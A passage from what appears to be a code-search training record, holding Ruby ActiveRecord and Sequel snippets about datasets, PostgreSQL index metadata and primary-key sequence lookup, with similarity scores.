"def schema_utility_dataset\n @schema_utility_dataset ||= dataset\n end",
"def schema_utility_dataset\n @schema_utility_dataset ||= dataset\n end",
"def link!\n base = ::ActiveRecord::Associations::ClassMethods::JoinDependency.new(\n @model, [], nil\n )\n \n @fields.each { |field|\n field.model ||= @model\n field.columns.each { |col|\n field.associations[col] = associations(col.__stack.clone)\n field.associations[col].each { |assoc| assoc.join_to(base) }\n }\n }\n \n @attributes.each { |attribute|\n attribute.model ||= @model\n attribute.columns.each { |col|\n attribute.associations[col] = associations(col.__stack.clone)\n attribute.associations[col].each { |assoc| assoc.join_to(base) }\n }\n }\n end",
"def dataset\n @@dataset\n end",
"def data(opts = {})\n sources = self.attributes[:sources] || []\n seq_opts = {:kind => self.attributes[:kind].to_sym}.merge(opts)\n sequence = SequenceQuery.new(sources, seq_opts)\n seqs = sequence.sequences\n seqs.map do |seq|\n {\n :data => seq[1],\n :start_time => sequence.start_time_epoch,\n :source => seq[0]\n }\n end\n end",
"def piedata\n\t\tlist = Array.new\n\t\tlabel = self.descriptions.joins(:identity).group(\"identities.name\").order(\"identities.name\").count\n\t\tlabel.each do |key, val|\n\t\t\th = Hash.new\n\t\t\th[:label] = key\n\t\t\th[:value] = val\n\t\t\tlist << h\n\t\tend\n\t\treturn list\n\tend",
"def fetch_data(key_list)\n data = self\n key_list.each { |key| data = fetch_key_with_initialization(key, data) }\n data\n end",
"def get_fields\n DatasetService.get_fields self.dataset_id, self.api_table_name\n end",
"def represent_dataset(dataset, mode, opts: nil, context: nil)\n dataset = modify_with(dataset, mode) if @modes[mode][:modifier]\n repr_proc = representer_proc(dataset.model, mode)\n rds = RepresentableDataset.new(dataset)\n\n # Paginate the dataset if pagination was passed.\n paginate(rds, opts) if opts\n\n # Map the dataset items into represented objects.\n rds.map! do |item|\n represented_object = RepresentedObject.new\n repr_proc.call(item, represented_object, context)\n end\n\n rds\n end",
"def associated_dataset\n cached_fetch(:_dataset){apply_dataset_changes(_associated_dataset)}\n end",
"def versions_dataset\n if versionable?\n internal_versions_dataset\n else\n self.class.where(:version_id => self.version_id).order(:version_number).reverse\n end\n end",
"def reference_datasets\n if @results.nil?\n @ref_datasets = @project.ref_datasets\n else\n @ref_datasets = @results\n end\n cur_page = (params[:page] || 1).to_i\n per_page = (params[:per_page] || 10).to_i\n @datasets = WillPaginate::Collection.create(\n cur_page, per_page, @ref_datasets.size) do |pager|\n start = (cur_page - 1) * per_page\n pager.replace(@ref_datasets[start, per_page])\n end\n end",
"def all\n @data_adapter.relations\n end",
"def initialize(_layout, _data=[], _queries=[])\n @layout = _layout\n @queries = _queries\n #puts \"DATASET NEW queries:#{@queries}\"\n super(_data)\n end",
"def set_data_list\n @data_list = DataList.find(params[:id])\n end",
"def load_data\n # @categories = Category.find(:all)\n # @infoitems = Expert.find(:all)\n end",
"def build\n attributes = { contains: build_file_sets }\n attributes[:hasMemberOrders] = [{ viewingDirection: reading_order }] if reading_order\n\n cocina_dro.structural.new(attributes)\n end"
] |
[
"0.6950944",
"0.61976147",
"0.6181576",
"0.57991093",
"0.5773287",
"0.56557083",
"0.5640482",
"0.5637681",
"0.5618548",
"0.5608803",
"0.56053627",
"0.55660987",
"0.5563028",
"0.55293816",
"0.5527643",
"0.55013406",
"0.5487018",
"0.5480283",
"0.5435237",
"0.5426875",
"0.54139185",
"0.54100746",
"0.5403118",
"0.5389728",
"0.5389728",
"0.5379883",
"0.53766817",
"0.53714913",
"0.53533304",
"0.53247404",
"0.52974594",
"0.5291655",
"0.5274306",
"0.5203773",
"0.51853067",
"0.51801485",
"0.5170918",
"0.5164159",
"0.5114678",
"0.51080334",
"0.5100059",
"0.50896734",
"0.508665",
"0.508665",
"0.508665",
"0.5077749",
"0.5076436",
"0.5068024",
"0.5066168",
"0.5043178",
"0.5036867",
"0.50356925",
"0.5034834",
"0.50332797",
"0.5030922",
"0.50276136",
"0.5012542",
"0.5008709",
"0.49940237",
"0.49540278",
"0.4947982",
"0.49472323",
"0.4938692",
"0.493819",
"0.4935486",
"0.4929171",
"0.49270883",
"0.49201107",
"0.4914722",
"0.4911662",
"0.49049157",
"0.49020216",
"0.49013793",
"0.4898689",
"0.48872682",
"0.48820946",
"0.48766163",
"0.48671493",
"0.4865747",
"0.48648155",
"0.48601425",
"0.485968",
"0.48524714",
"0.48499334",
"0.48499334",
"0.4835667",
"0.48350686",
"0.48215988",
"0.48180273",
"0.48108953",
"0.48106116",
"0.48073158",
"0.48043525",
"0.48030728",
"0.48028263",
"0.4793798",
"0.4793004",
"0.4784258",
"0.47821382",
"0.4778656"
] |
0.68358237
|
1
|
Dataset used to retrieve index information
|
def _indexes_ds
@_indexes_ds ||= begin
if server_version >= 90500
order = [Sequel[:indc][:relname], Sequel.function(:array_position, Sequel[:ind][:indkey], Sequel[:att][:attnum])]
# :nocov:
else
range = 0...32
order = [Sequel[:indc][:relname], SQL::CaseExpression.new(range.map{|x| [SQL::Subscript.new(Sequel[:ind][:indkey], [x]), x]}, 32, Sequel[:att][:attnum])]
# :nocov:
end
attnums = SQL::Function.new(:ANY, Sequel[:ind][:indkey])
ds = metadata_dataset.
from{pg_class.as(:tab)}.
join(Sequel[:pg_index].as(:ind), :indrelid=>:oid).
join(Sequel[:pg_class].as(:indc), :oid=>:indexrelid).
join(Sequel[:pg_attribute].as(:att), :attrelid=>Sequel[:tab][:oid], :attnum=>attnums).
left_join(Sequel[:pg_constraint].as(:con), :conname=>Sequel[:indc][:relname]).
where{{
indc[:relkind]=>%w'i I',
ind[:indisprimary]=>false,
:indexprs=>nil,
:indisvalid=>true}}.
order(*order).
select{[indc[:relname].as(:name), ind[:indisunique].as(:unique), att[:attname].as(:column), con[:condeferrable].as(:deferrable)]}
# :nocov:
ds = ds.where(:indisready=>true) if server_version >= 80300
ds = ds.where(:indislive=>true) if server_version >= 90300
# :nocov:
ds
end
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def index\n @dataset_data = DatasetDatum.all\n end",
"def indices\n @data.keys\n end",
"def construct_index\n end",
"def dataset(index)\n idx_name = IndexName[index]\n Dataset.new(client, params: { index: idx_name.to_sym })\n end",
"def indexed\n self['indexed']\n end",
"def index_information\n @db.index_information(@name)\n end",
"def index\n @datasets = Dataset.all\n end",
"def index\n @datasets = Dataset.all\n end",
"def index\n @datasets = Dataset.all\n end",
"def index_item(name, datapoints, values, fingerprint, trend)\n @client.index({:datapoints => datapoints, :fingerprint => fingerprint, :values => values, :trend => trend, :id => name})\n end",
"def indexed\n meta(index: true)\n end",
"def get_index_values\n hash = {}\n @db.connect\n @index_fields.each do |field|\n tname = table_name field\n sql = \"SELECT id,value FROM #{tname}\"\n res = @db.query(sql)\n res.each_hash do |row|\n hash[row['value']] = row['id']\n end\n end\n @db.close \n hash\n end",
"def index_information\n @db.index_information(@name)\n end",
"def index_information\n collection.index_information\n end",
"def index_information\n collection.index_information\n end",
"def index_information\n collection.index_information\n end",
"def index\n @datat_table_data = DatatTableDatum.all\n end",
"def index\n @train_data = TrainDatum.all\n end",
"def index\n\n @data = Datum.all\n end",
"def index\n @qdatasets = Qdataset.all\n end",
"def ta_index\n end",
"def values\n raise NotImplementedError, \"#{__method__} has not been implemented for this #{name} index\"\n end",
"def index\n @data_set_types = DataSetType.all\n end",
"def index\n @sample_metadata_numericals = SampleMetadataNumerical.all\n end",
"def dataset\n @@dataset\n end",
"def index\n set_index\n end",
"def dataset\n self\n end",
"def dataset\n self\n end",
"def dataset\n self\n end",
"def dataset\n database[table_name]\n end",
"def get_index_info(klass)\n index_info = []\n indexes = klass.connection.indexes(klass.table_name)\n indexes.each do |index|\n index_info << { :name => index.name, :columns => index.columns.join(\", \"), :unique => (index.unique ? \"UNIQUE\" : \"NO\") }\n end\n index_info\n end",
"def dataset_key\n :id\n end",
"def get_indexed_attributes\n {\n data_version: data_version || self.class.current_data_version_number\n }.merge(self.get_crud_attributes)\n end",
"def index; @index; end",
"def data\n @data ||= MultiJson.load(File.read(index_path))\n end",
"def index\r\n build_index unless @index\r\n @index\r\n end",
"def process_dataset_results( results )\n # Extract all of the needed index mapping data from \"attribute_map\"\n map_data = process_attribute_map( @current[:dataset_conf] )\n \n # Now loop through the result data...\n results[:data].each do |data_row|\n # First, create a hash out of the data_row and get the primary_attr_value\n data_row_obj = convert_array_to_hash( results[:headers], data_row )\n primary_attr_value = data_row_obj[ map_data[:primary_attribute] ]\n \n # First check we have something to map back to the index with - if not, move along...\n if primary_attr_value\n # Find us a doc object to map to...\n value_to_look_up_doc_on = extract_value_to_index( map_data[:primary_attribute], primary_attr_value, map_data[:attribute_map], data_row_obj )\n doc = find_document( map_data[:map_to_index_field], value_to_look_up_doc_on )\n \n # If we can't find one - see if we're allowed to create one\n unless doc\n if @current[:dataset_conf][\"indexing\"][\"allow_document_creation\"]\n set_document( value_to_look_up_doc_on, new_document() )\n doc = get_document( value_to_look_up_doc_on )\n end\n end\n \n # Okay, if we have a doc - process the biomart attributes\n if doc\n # Now do the processing\n data_row_obj.each do |attr_name,attr_value|\n # Extract and index our initial data return\n value_to_index = extract_value_to_index( attr_name, attr_value, map_data[:attribute_map], data_row_obj )\n \n if value_to_index and doc[ map_data[:attribute_map][attr_name][\"idx\"] ]\n if value_to_index.is_a?(Array)\n value_to_index.each do |value|\n doc[ map_data[:attribute_map][attr_name][\"idx\"] ].push( value )\n end\n else\n doc[ map_data[:attribute_map][attr_name][\"idx\"] ].push( value_to_index )\n end\n end\n \n # Any further metadata to be extracted from here?\n if value_to_index and map_data[:attribute_map][attr_name][\"extract\"]\n index_extracted_attributes( map_data[:attribute_map][attr_name][\"extract\"], doc, value_to_index )\n end\n end\n \n # Do we have any attributes that we need to group together?\n if @current[:dataset_conf][\"indexing\"][\"grouped_attributes\"]\n index_grouped_attributes( @current[:dataset_conf][\"indexing\"][\"grouped_attributes\"], doc, data_row_obj, map_data )\n end\n \n # Any ontology terms to index?\n if @current[:dataset_conf][\"indexing\"][\"ontology_terms\"]\n index_ontology_terms( @current[:dataset_conf][\"indexing\"][\"ontology_terms\"], doc, data_row_obj, map_data )\n end\n \n # Finally - save the document to the cache\n doc_primary_key = doc[@config[\"schema\"][\"unique_key\"].to_sym][0]\n set_document( doc_primary_key, doc )\n end\n end\n end\n end",
"def index\n @index ||= tree.all_data.index(entry)\n end",
"def index\n retrieve_data_for_graph\n end",
"def dataset\n DB[SQL, from: from_truncated, to: to_truncated, tick: tick]\n end",
"def index\n @column_samples = ColumnSample.all\n end",
"def [](index)\n load_data\n super\n end",
"def index ; @index ; end",
"def as_indexed_json\n indexed_values\n end",
"def index\n @data_items = DataItem.all\n end",
"def build_indexes\n Patient.column_names.select { |col| col != 'id' }.each do |col|\n @indexes[ col.to_sym ] = []\n end\n\n Patient.find( :all ).each do |patient|\n Patient.column_names.select { |col| col != 'id' }.each do |col|\n @indexes[ col.to_sym ] << [ patient.send( col ).to_s.strip.hash, patient.id ] unless\n ( (! EXCLUSIONS[ col ].nil?) and EXCLUSIONS[ col ].include? patient.send( col ).to_s.strip )\n end\n end\n\n @indexes.each_value { |value| value.sort! { |a,b| a[0] <=> b[0] } }\n end",
"def index\n load_data\n end",
"def indices\n state(metrics: \"metadata\").dig(\"metadata\", \"indices\")\n end",
"def indexes\n raise 'not implemented'\n end",
"def index\n @input_data = InputDatum.all\n end",
"def dataset_index_conf\n dataset_conf = []\n @config[\"datasets_to_index\"].each do |ds_name|\n ds_conf = JSON.load( File.new(\"#{File.dirname(__FILE__)}/../config/datasets/#{ds_name}/config.json\",\"r\") )\n if ds_conf[\"index\"] and !ds_conf[\"indexing\"].nil?\n ds_conf[\"internal_name\"] = ds_name\n dataset_conf.push( ds_conf )\n end\n end\n return dataset_conf\n end",
"def metadata\n DatasetService.get_metadata dataset_id\n end",
"def indices\n { persona: persona_index,\n numerus: [0, 3],\n genus: [0],\n modus: [0, 6],\n tempus: [nil, nil, nil, 0, 12, 24],\n }\n end",
"def indexes\n @indexes ||= []\n end",
"def construct_index\n @logger.fine('Constructing index...')\n File.open(@index_path, 'wb') do |f|\n write_int(@data_timestamp, f) # The timestamp value - used to determine if an index is valid.\n write_int(0, f) # The first row - always at offset 0.\n @data.each_line { write_int(@data.pos, f) } # The rest of the rows.\n end\n end",
"def index\n database.index\n end",
"def index\n @request_data = RequestDatum.all\n end",
"def index\n unless @descriptor_index\n @descriptor_index = all.inject({}) do |hash,d|\n hash[d.index_key] = d\n hash\n end\n end\n @descriptor_index\n end",
"def index\n @ga_data = GaDatum.all\n end",
"def index\n @index ||= self.class.index\n end",
"def index_data(*models)\n if models.nil? || models.empty?\n only_index = @indexed_models\n else\n only_index = models.collect{|m| m.to_s}\n end \n \n Mebla.log(\"Indexing #{only_index.join(\", \")}\", :debug)\n \n # Build up a bulk query to save processing and time\n bulk_query = \"\"\n # Keep track of indexed documents\n indexed_count = {}\n \n # Create the index\n if create_index\n # Start collecting documents\n only_index.each do |model|\n Mebla.log(\"Indexing: #{model}\")\n # Get the class\n to_index = model.camelize.constantize\n \n # Get the records \n entries = []\n unless to_index.embedded?\n if to_index.sub_class?\n entries = to_index.any_in(:_type => [to_index.name])\n else \n entries = to_index.any_in(:_type => [nil, to_index.name])\n end\n else\n parent = to_index.embedded_parent\n access_method = to_index.embedded_as\n \n parent.all.each do |parent_record|\n if to_index.sub_class?\n entries += parent_record.send(access_method.to_sym).any_in(:_type => [to_index.name])\n else\n entries += parent_record.send(access_method.to_sym).any_in(:_type => [nil, to_index.name])\n end\n end\n end\n \n # Save the number of entries to be indexed\n indexed_count[model] = entries.count \n \n # Build the queries for this model \n entries.each do |document|\n attrs = {} #document.attributes.dup # make sure we dont modify the document it self\n attrs[:id] = document.attributes[\"_id\"] # the id is already added in the meta data of the action part of the query\n \n # only index search fields and methods\n document.class.search_fields.each do |field|\n if document.attributes.keys.include?(field.to_s)\n attrs[field] = document.attributes[field.to_s] # attribute\n else\n attrs[field] = document.send(field) # method\n end\n end\n \n # index relational fields\n document.class.search_relations.each do |relation, fields| \n items = document.send(relation.to_sym) # get the relation document\n \n next if items.nil?\n \n # N relation side\n if items.is_a?(Array) || items.is_a?(Mongoid::Relations::Targets::Enumerable)\n next if items.empty?\n attrs[relation] = []\n items.each do |item|\n if fields.is_a?(Array) # given multiple fields to index\n fields_values = {}\n fields.each do |field|\n if item.attributes.keys.include?(field.to_s)\n fields_values.merge!({ field => item.attributes[field.to_s] }) # attribute\n else\n fields_values.merge!({ field => item.send(field) }) # method\n end\n end\n attrs[relation] << fields_values\n else # only index one field in the relation\n if item.attributes.keys.include?(fields.to_s)\n attrs[relation] << { fields => item.attributes[fields.to_s] } # attribute\n else\n attrs[relation] << { fields => item.send(fields) } # method\n end\n end\n end\n # 1 relation side\n else\n attrs[relation] = {}\n if fields.is_a?(Array) # given multiple fields to index\n fields_values = {}\n fields.each do |field|\n if items.attributes.keys.include?(field.to_s)\n fields_values.merge!({ field => items.attributes[field.to_s] }) # attribute\n else\n fields_values.merge!({ field => items.send(field) }) # method\n end\n end\n attrs[relation].merge!(fields_values)\n else # only index one field in the relation\n if items.attributes.keys.include?(fields.to_s)\n attrs[relation].merge!({ fields => items.attributes[fields.to_s] }) # attribute\n else\n attrs[relation].merge!({ fields => items.send(fields) }) # method\n end\n end\n end\n end \n \n # If embedded get the parent id\n if document.embedded?\n parent_id = document.send(document.class.embedded_parent_foreign_key.to_sym).id.to_s \n attrs[(document.class.embedded_parent_foreign_key + \"_id\").to_sym] = parent_id\n attrs[:_parent] = parent_id\n \n # Build add to the bulk query\n bulk_query << build_bulk_query(@slingshot_index_name, to_index.slingshot_type_name, document.id.to_s, attrs, parent_id)\n else\n # Build add to the bulk query\n bulk_query << build_bulk_query(@slingshot_index_name, to_index.slingshot_type_name, document.id.to_s, attrs)\n end\n end\n end\n else\n raise Mebla::Errors::MeblaIndexException.new(\"Could not create #{@slingshot_index_name}!!!\")\n end \n \n Mebla.log(\"Bulk indexing:\\n#{bulk_query}\", :debug) \n \n # Send the query\n response = Slingshot::Configuration.client.post \"#{Mebla::Configuration.instance.url}/_bulk\", bulk_query\n \n # Only refresh the index if no error ocurred\n unless response =~ /error/ \n # Log results\n Mebla.log(\"Indexed #{only_index.count} model(s) to #{self.slingshot_index_name}: #{response}\")\n Mebla.log(\"Indexing Report:\")\n indexed_count.each do |model_name, count|\n Mebla.log(\"Indexed #{model_name}: #{count} document(s)\")\n end\n \n # Refresh the index\n refresh_index\n else\n raise Mebla::Errors::MeblaIndexException.new(\"Indexing #{only_index.join(\", \")} failed with the following response:\\n #{response}\")\n end\n rescue RestClient::Exception => error\n raise Mebla::Errors::MeblaIndexException.new(\"Indexing #{only_index.join(\", \")} failed with the following error: #{error.message}\")\n end",
"def initial_data\n @query_tracker.results.map.with_index do |data, index|\n data = data.dup\n data['_id'] = data['_id'].to_s\n [index, data]\n end\n end",
"def indices\n rest.get instrument_path('indices')\n end",
"def data\n datacolumns.reduce({}) do |t, col|\n t[col.name] = col.data; t\n end\n end",
"def index_id\n @raw[\"indexId\"]\n end",
"def index_signature; end",
"def index_params\n { index: name.dataset.to_sym,\n body: {\n settings: self.class.index_settings,\n mappings: { properties: schema.to_properties } } }\n end",
"def index\n @title=\"Rothstein lab raw colony size data\"\n @header=\"<h1>#{@title}</h1><em>Log Files!</em>\"\n @experiment_raw_datasets = ExperimentRawDataset.all\n end",
"def get_indices(group_name)\n return {} if new_record?\n res = {}\n Property::Db.fetch_attributes(%w{key value}, index_table_name(group_name), index_reader_sql(group_name)).each do |row|\n res[row['key']] = row['value']\n end\n res\n end",
"def open_index(o={})\n @clf = cache_data('clf', Searcher.load_features())\n @con_weights = cache_data('con_weights', Searcher.load_weights(CON_FEATURES, 'con', Conf.weight_con))\n @doc_weights = cache_data('doc_weights', Searcher.load_weights(DOC_FEATURES, 'doc', Conf.weight_doc))\n end",
"def index\n @tbdata = Tbdatum.all\n end",
"def index(data)\n indexH = Hash.new { |hash, key| hash[key] = [] }\n data.each_pair do |filename, tags|\n tags.each do |tag|\n if tag.is_a? Symbol\n indexH[tag] << filename\n elsif tag.is_a? Hash\n tag.each_pair do |sub_key, sub_value|\n #key = tag.keys.first\n #value = tag[key]\n value = sub_key\n indexH[sub_key] << sub_value #in case of project and sample it store (samples|projects) [(samples|projects)_name]\n indexH[sub_value]<< filename #stores for each (sample|project) name its filename so i can search directly for its name\n end\n end\n end #tags\n end #data\n indexH.each_pair do |key, value|\n indexH[key].uniq!\n end\n end",
"def dataset\n @dataset ||= data_maker.dataset\n end",
"def index\n @test_meta_data = TestMetaDatum.all\n end",
"def indexes\n @model.indexes.select{|index| index.columns.include? self.name}\n end",
"def results\n @dataset.all\n end",
"def indexed_attributes\n self.class.columns.select { |c| %i(text string).include?(c.type) }\n .collect(&:name)\n .reject { |c| c =~ /_url$/ } - non_indexed_attributes\n end",
"def index\n table.columns.index self\n end",
"def index\n @attdata = Attdatum.all\n end",
"def tableau index_tableau\n tableaux_in(resultat_final)[index_tableau]\n end",
"def setting_index\n end",
"def index\n @datasets = Dataset.published\n \n respond_to do |format|\n format.html # index.html.erb\n format.xml { render :xml => @datasets }\n end\n end",
"def _metadata_dataset\n super.\n with_identifier_input_method(identifier_input_method_default).\n with_identifier_output_method(identifier_output_method_default)\n end",
"def index\n @dataunits = Dataunit.all\n end",
"def [](index); @data[index]; end",
"def index\n @sub_data_tables = SubDataTable.all\n end",
"def index_fields\n\t\t\tif defined? @_index_fields\n\t\t\t\t@_index_fields\n\t\t\telse\n\t\t\t\t#column_names = self.column_names.map do |m|\n\t\t\t\t\t#m.to_sym\n\t\t\t\t#end\n\t\t\t\tsorted_attributes\n\t\t\t# \tsorted_attrs + (column_names - sorted_attrs - [\"created_at\", \"updated_at\", \"id\"])\n\t\t\tend\n\t\tend",
"def index\n set_instruments_grid\n end",
"def metadata_adapter\n Valkyrie::MetadataAdapter.find(:indexing_persister)\n end",
"def metadata_adapter\n Valkyrie::MetadataAdapter.find(:indexing_persister)\n end",
"def metadata\n { \"name\" => name,\n \"description\" => description,\n \"license\" => license,\n \"source\" => datasource.title,\n \"url\" => datasource.url,\n \"publish_date\" => published_at,\n \"default\" => default_dim,\n \"units\" => {}, \n \"indvars\" => datacolumns.independent.map(&:name),\n \"depvars\" => datacolumns.dependent.map(&:name)\n }\n end",
"def index_keys\n index_specifications.map(&:key)\n end",
"def show\n set_index_options\n end",
"def index\n my_tenant_id = (current_user.role == 'admin' ? current_user.tenant_id : nil)\n @all_stats = Stats.new\n @seven_day_stats = Stats.new(tenant_id: my_tenant_id, since: (Time.new - 7.days))\n\n @ds_identifiers = build_table_query\n end",
"def store_index #:nodoc:\n return if @compatibility == 0\n\n indices = @db_indices\n reserved = 0x00000000\n row_min = @dim_rowmin\n row_max = @dim_rowmax\n\n record = 0x020B # Record identifier\n length = 16 + 4 * indices.size # Bytes to follow\n\n header = [record, length].pack('vv')\n data = [reserved, row_min, row_max, reserved].pack('VVVV')\n\n indices.each do |index|\n data = data + [index + @offset + 20 + length + 4].pack('V')\n end\n\n prepend(header, data)\n end",
"def index\n @unstructured_data = UnstructuredDatum.includes(:subcriterium).all\n end",
"def index\n @datasets = Dataset.select_without_data.order(:name).page(params[:page])\n end",
"def index\n @project_datum_columns = ProjectDatumColumn.all\n end",
"def index\n @specdata = Specdatum.all\n end",
"def dataset_method\n :\"#{self[:name]}_dataset\"\n end"
] |
[
"0.71727204",
"0.69043535",
"0.66589785",
"0.6559253",
"0.6507489",
"0.6449275",
"0.6387849",
"0.6387849",
"0.6387849",
"0.63644105",
"0.63298535",
"0.63144547",
"0.6288391",
"0.6281459",
"0.6281459",
"0.6281459",
"0.62788105",
"0.62172794",
"0.62114143",
"0.6202234",
"0.61961377",
"0.60516787",
"0.60452145",
"0.6041444",
"0.60284466",
"0.6001589",
"0.59966236",
"0.59966236",
"0.59966236",
"0.5994592",
"0.59917146",
"0.59666157",
"0.5955333",
"0.5940853",
"0.5936902",
"0.5935593",
"0.5932327",
"0.5932007",
"0.59201574",
"0.5919278",
"0.5906841",
"0.5879718",
"0.5872798",
"0.5871346",
"0.58657366",
"0.58493286",
"0.58464754",
"0.58374166",
"0.5821109",
"0.58204913",
"0.5819026",
"0.58178353",
"0.58115834",
"0.5808004",
"0.5806543",
"0.57962114",
"0.5793748",
"0.57904583",
"0.5777619",
"0.5773533",
"0.57698315",
"0.57666945",
"0.57398164",
"0.57370484",
"0.572276",
"0.5711605",
"0.5710589",
"0.5710453",
"0.5707823",
"0.5706268",
"0.57038176",
"0.569949",
"0.56901217",
"0.56895614",
"0.5680114",
"0.5674988",
"0.56741965",
"0.5673481",
"0.566609",
"0.566317",
"0.56571317",
"0.56395787",
"0.56355685",
"0.5635461",
"0.5626052",
"0.5619468",
"0.5617353",
"0.560983",
"0.5596405",
"0.5596405",
"0.55954534",
"0.558975",
"0.55847347",
"0.5583453",
"0.5583432",
"0.55812025",
"0.5579173",
"0.5568659",
"0.5565827",
"0.5563134"
] |
0.70689636
|
1
|
Dataset used to determine custom serial sequences for tables
|
def _select_custom_sequence_ds
@_select_custom_sequence_ds ||= metadata_dataset.
from{pg_class.as(:t)}.
join(:pg_namespace, {:oid => :relnamespace}, :table_alias=>:name).
join(:pg_attribute, {:attrelid => Sequel[:t][:oid]}, :table_alias=>:attr).
join(:pg_attrdef, {:adrelid => :attrelid, :adnum => :attnum}, :table_alias=>:def).
join(:pg_constraint, {:conrelid => :adrelid, Sequel[:cons][:conkey].sql_subscript(1) => :adnum}, :table_alias=>:cons).
where{{cons[:contype] => 'p', pg_get_expr(self.def[:adbin], attr[:attrelid]) => /nextval/i}}.
select{
expr = split_part(pg_get_expr(self.def[:adbin], attr[:attrelid]), "'", 2)
[
name[:nspname].as(:schema),
Sequel.case({{expr => /./} => substr(expr, strpos(expr, '.')+1)}, expr).as(:sequence)
]
}
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def _select_serial_sequence_ds\n @_serial_sequence_ds ||= metadata_dataset.\n from{[\n pg_class.as(:seq),\n pg_attribute.as(:attr),\n pg_depend.as(:dep),\n pg_namespace.as(:name),\n pg_constraint.as(:cons),\n pg_class.as(:t)\n ]}.\n where{[\n [seq[:oid], dep[:objid]],\n [seq[:relnamespace], name[:oid]],\n [seq[:relkind], 'S'],\n [attr[:attrelid], dep[:refobjid]],\n [attr[:attnum], dep[:refobjsubid]],\n [attr[:attrelid], cons[:conrelid]],\n [attr[:attnum], cons[:conkey].sql_subscript(1)],\n [attr[:attrelid], t[:oid]],\n [cons[:contype], 'p']\n ]}.\n select{[\n name[:nspname].as(:schema),\n seq[:relname].as(:sequence)\n ]}\n end",
"def sequence_number; end",
"def pk_and_sequence_for(table)\n # try looking for a seq with a dependency on the table's primary key :\n result = select(<<-end_sql, 'PK and Serial Sequence')[0]\n SELECT attr.attname, seq.relname\n FROM pg_class seq,\n pg_attribute attr,\n pg_depend dep,\n pg_constraint cons\n WHERE seq.oid = dep.objid\n AND seq.relkind = 'S'\n AND attr.attrelid = dep.refobjid\n AND attr.attnum = dep.refobjsubid\n AND attr.attrelid = cons.conrelid\n AND attr.attnum = cons.conkey[1]\n AND cons.contype = 'p'\n AND dep.refobjid = '#{quote_table_name(table)}'::regclass\n end_sql\n\n if result.nil? || result.empty?\n # if that fails, try parsing the primary key's default value :\n result = select(<<-end_sql, 'PK and Custom Sequence')[0]\n SELECT attr.attname,\n CASE\n WHEN pg_get_expr(def.adbin, def.adrelid) !~* 'nextval' THEN NULL\n WHEN split_part(pg_get_expr(def.adbin, def.adrelid), '''', 2) ~ '.' THEN\n substr(split_part(pg_get_expr(def.adbin, def.adrelid), '''', 2),\n strpos(split_part(pg_get_expr(def.adbin, def.adrelid), '''', 2), '.')+1)\n ELSE split_part(pg_get_expr(def.adbin, def.adrelid), '''', 2)\n END as relname\n FROM pg_class t\n JOIN pg_attribute attr ON (t.oid = attrelid)\n JOIN pg_attrdef def ON (adrelid = attrelid AND adnum = attnum)\n JOIN pg_constraint cons ON (conrelid = adrelid AND adnum = conkey[1])\n WHERE t.oid = '#{quote_table_name(table)}'::regclass\n AND cons.contype = 'p'\n AND pg_get_expr(def.adbin, def.adrelid) ~* 'nextval|uuid_generate'\n end_sql\n end\n\n [ result['attname'], result['relname'] ]\n rescue\n nil\n end",
"def uses_sequence\n select_value(\"SELECT name FROM sqlite_master WHERE type='table' AND name='sqlite_sequence';\")\n end",
"def pk_and_sequence_for(table) #:nodoc:\n # First try looking for a sequence with a dependency on the\n # given table's primary key.\n result = select(<<-end_sql, 'PK and serial sequence')[0]\n SELECT attr.attname, seq.relname\n FROM pg_class seq,\n pg_attribute attr,\n pg_depend dep,\n pg_namespace name,\n pg_constraint cons\n WHERE seq.oid = dep.objid\n AND seq.relkind = 'S'\n AND attr.attrelid = dep.refobjid\n AND attr.attnum = dep.refobjsubid\n AND attr.attrelid = cons.conrelid\n AND attr.attnum = cons.conkey[1]\n AND cons.contype = 'p'\n AND dep.refobjid = '#{quote_table_name(table)}'::regclass\n end_sql\n\n if result.nil? or result.empty?\n # If that fails, try parsing the primary key's default value.\n # Support the 7.x and 8.0 nextval('foo'::text) as well as\n # the 8.1+ nextval('foo'::regclass).\n result = select(<<-end_sql, 'PK and custom sequence')[0]\n SELECT attr.attname,\n CASE\n WHEN split_part(def.adsrc, '''', 2) ~ '.' THEN\n substr(split_part(def.adsrc, '''', 2),\n strpos(split_part(def.adsrc, '''', 2), '.')+1)\n ELSE split_part(def.adsrc, '''', 2)\n END as relname\n FROM pg_class t\n JOIN pg_attribute attr ON (t.oid = attrelid)\n JOIN pg_attrdef def ON (adrelid = attrelid AND adnum = attnum)\n JOIN pg_constraint cons ON (conrelid = adrelid AND adnum = conkey[1])\n WHERE t.oid = '#{quote_table_name(table)}'::regclass\n AND cons.contype = 'p'\n AND def.adsrc ~* 'nextval'\n end_sql\n end\n\n [result[\"attname\"], result[\"relname\"]]\n rescue\n nil\n end",
"def sequence_values(rep_prefix, table_name)\n # check if the table has an auto_increment column, return if not\n sequence_row = select_one(<<-end_sql)\n show columns from `#{table_name}` where extra = 'auto_increment'\n end_sql\n return {} unless sequence_row\n column_name = sequence_row['Field']\n\n # check if the sequences table exists, create if necessary\n sequence_table_name = \"#{rep_prefix}_sequences\"\n unless tables.include?(sequence_table_name)\n create_table \"#{sequence_table_name}\".to_sym,\n :id => false, :options => 'ENGINE=MyISAM' do |t|\n t.column :name, :string\n t.column :current_value, :integer\n t.column :increment, :integer\n t.column :offset, :integer\n end\n ActiveRecord::Base.connection.execute(<<-end_sql) rescue nil\n ALTER TABLE \"#{sequence_table_name}\"\n ADD CONSTRAINT #{sequence_table_name}_pkey\n PRIMARY KEY (name)\n end_sql\n end\n\n sequence_row = select_one(\"select current_value, increment, offset from #{sequence_table_name} where name = '#{table_name}'\")\n if sequence_row == nil\n current_max = select_one(<<-end_sql)['current_max'].to_i\n select max(`#{column_name}`) as current_max from `#{table_name}`\n end_sql\n return {column_name => {\n :increment => 1,\n :value => current_max\n }\n }\n else\n return {column_name => {\n :increment => sequence_row['increment'].to_i,\n :value => sequence_row['offset'].to_i\n }\n }\n end\n end",
"def sequence\n @sequence\n end",
"def set_sequence\n if seq!= nil\n sequence=\"\"\n seq.each_with_index do |s,index|\n sequence = sequence + s +\",\"\n end\n if examquestion_ids.count > seq.count\n diff_count = examquestion_ids.count - seq.count\n 0.upto(diff_count-1) do |c|\n sequence = sequence + \"Select\"+\",\"\n end\n end \n self.sequ = sequence \n end\n end",
